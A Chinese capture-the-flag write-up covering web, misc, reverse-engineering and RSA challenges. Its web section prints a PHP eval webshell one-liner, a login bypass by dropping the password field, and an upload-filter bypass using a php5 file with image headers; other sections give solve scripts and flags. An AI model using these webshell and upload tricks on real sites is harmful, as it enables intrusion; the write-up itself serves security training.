2019安全运维赛_Ginkgo


WEB

0x01 easfbypass

image.png-24.5kB

写shell,传入

eval($_POST[%27cd%27]);

用蚁剑连接同时可以在phpinfo中看到被禁用了很多函数

image.png-37.8kB

那就可以上传bypass来readflag

image.png-113.7kB

image.png-44.7kB

0x04 ezupload

首先F12看到有.swp的备份文件,放到linux里用vim -r恢复一下得到源码,

$sql = "select password from user where name=?";
    if ($stmt = $mysqli->prepare($sql)) {
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($dpasswd);
        $stmt->fetch();
        if ($dpasswd === $password){
            $_SESSION['login'] = 1;
            header("Location: /upload.php");
        }else{
            die("login failed");
        }
        $stmt->close();

访问upload,会提示plz login,首先在登录页面抓包到reapter,去掉后面的password

image.png-106kB

会发现有302跳转,再次访问upload会来到上传界面

image.png-23.8kB

此时上传php5后缀的一句话,内容前面加上jpg图片的信息

image.png-109.1kB

上传成功

image.png-31.5kB

然后用蚁剑连接

image.png-117.5kB

image.png-13.3kB

image.png-4kB

MISC

0x01 misc1

下载文件打开,发现是乱码,尝试一下修改编码,直接修改一下后缀,使用word打开。选择编码,查看文件一段类似flag的字符串

image.png-34.4kB

image.png-72.6kB

大括号没有正确显示,修改一下即可获取flag

0x02 misc2

访问页面

image.png-106.2kB

给了我们网站源码,可以看到在/r路由下存在任意文件读取

image.png-191.5kB

不过根目录下的flag已经被删除了,我们不能用常规方法去读取文件,不过,在原来做题的时候使用过 文件描述符,已经在使用的文件,被删除时,在文件描述符中还存在,我们可以通过读取文件描述符进行flag的获取,文件描述符目录:/dev/fd,遍历读取fd下面的目录,获取到flag

image.png-70.4kB

0x03 misc3

首先下载附件,发现是一个html页面
然后F12查看源代码

image.png-74.6kB

发现有一堆这么奇怪的东西

然后讲其提取出来将&zwnj替换为0,​替换为1,得到一串二进制数

0110011001101100011000010110011101111011011001010011001001100001001110010110001100111000011000100011000100110001001101110011010101100101001101100011011001100011011001100011001000110001011001100011100000110101001110010011001101100010011000110011100000110101011000100110011000111001001100110011100101111101

然后将这串二进制数转换为字符得到flag:flag{e2a9c8b1175e66cf21f8593bc85bf939}

0x04 webshell

分析数据包,跟一下HTTP流,发现存在加密的木马文件

image.png-156.8kB

对木马文件进行解密

image.png-304.9kB

整理一下马的格式,发现传输的数据是以AES加密传输的,看一下返回的数据

image.png-130.5kB

根据php代码逻辑,删除前面和后面附加的字符串,最后根据获取到的key和木马进行解密

image.png-109.2kB

可以看到最后一段加密字符为base64加密,直接解密一下,直接获取到flag

image.png-55.9kB

0x05 twocats

看到给了两张图片,意识到可能是盲水印,用盲水印脚本提取出图片来:

image.png-81.2kB

image.png-109.6kB

用stegosovle打开,凑活着看出来了:

image.png-87.2kB

flag{BlindWaterMark1234}

RE

0x01 RE1

image.png-15.2kB

程序在init部分的算法才是真正的算法。逻辑是利用key算出一个256字节的box,通过box和输入值计算出output。

image.png-27.9kB

值得注意的是key初始值要进行一个每位异或7的处理

image.png-42.7kB

由于box的生成没有受输入干扰,直接动调dump出每次和input异或的内容,编写如下脚本:

xorbox = [0xc,0x1,0x33,0x2f,0x7a,0x7c,0xe0,0x0,0x3,0x7a,0x73,0x4e,0x88,0x6d,0xd2,0xcc]
output = [0xFF,0xE1,0x5F,0xD7,0x25,0x10,0x13,0x71,0x74,0xBF,0x19,0x16,0x5F,0x5E,0x30,0x7F]
inputbox = []
for i in range(8):
    tmp = output[16 - i - 1]
    output[16 - i - 1] = output[i]
    output[i] = tmp
for i in range(0x10):
    inputtmp = xorbox[i] ^ output[i]
    inputbox.append(inputtmp)
    print(chr(inputtmp), end = "")
flag{s1mple_trick_233}

###0x02 RE2

打开程序分析,是一个32个未知数的多项式方程

image.png-86.5kB

matlab编写程序解方程组

image.png-205.2kB

得到flag

image.png-66.8kB

Crypto

0x01 RSA1

分析题目,首先是得到400位的p,q是通过p的高低位互换,用n的高199位和低199位,中间一位不确定,靠尝试可知为2,通过n来获得q和高位和低位的乘积,通过iroot开方得到p和q的值,求d,从而获取m的值,详细代码如下所示:

from Crypto.Util.number import *
import gmpy2
import random

def getpq(x):
    y=((n-x*pow(10,400))-x)/pow(10,200)
    p=gmpy2.iroot((y+gmpy2.iroot(y*y-4*x*x,2)[0])/2,2)[0]
    q=x//p  
    p=str(p)
    q=str(q)    
    p=int(str(p+q))
    q=n/p
    return p,q

e = 65537

n=21173064304574950843737446409192091844410858354407853391518219828585809575546480463980354529412530785625473800210661276075473243912578032636845746866907991400822100939309254988798139819074875464612813385347487571449985243023886473371811269444618192595245380064162413031254981146354667983890607067651694310528489568882179752700069248266341927980053359911075295668342299406306747805925686573419756406095039162847475158920069325898899318222396609393685237607183668014820188522330005608037386873926432131081161531088656666402464062741934007562757339219055643198715643442608910351994872740343566582808831066736088527333762011263273533065540484105964087424030617602336598479611569611018708530024591023015267812545697478378348866840434551477126856261767535209092047810194387033643274333303926423370062572301

c=16396023285324039009558195962852040868243807971027796599580351414803675753933120024077886501736987010658812435904022750269541456641256887079780585729054681025921699044139927086676479128232499416835051090240458236280851063589059069181638802191717911599940897797235038838827322737207584188123709413077535201099325099110746196702421778588988049442604655243604852727791349351291721230577933794627015369213339150586418524473465234375420448340981330049205933291705601563283196409846408465061438001010141891397738066420524119638524908958331406698679544896351376594583883601612086738834989175070317781690217164773657939589691476539613343289431727103692899002758373929815089904574190511978680084831183328681104467553713888762965976896013404518316128288520016934828176674482545660323358594211794461624622116836

x=2117306430457495084373744640919209184441085835440785339151821982858580957554648046398035452941253078562547380021066127607547324391257803263684574686690799140082210093930925498879813981907487546461281266736088527333762011263273533065540484105964087424030617602336598479611569611018708530024591023015267812545697478378348866840434551477126856261767535209092047810194387033643274333303926423370062572301

if __name__ == "__main__":
    p,q=getpq(x)
    d=gmpy2.invert(e,(p-1)*(q-1))
    m=pow(c,d,n)
    print hex(m)
    print(hex(m)[2:].decode('hex'))

image.png-80.5kB

发表评论

电子邮件地址不会被公开。 必填项已用*标注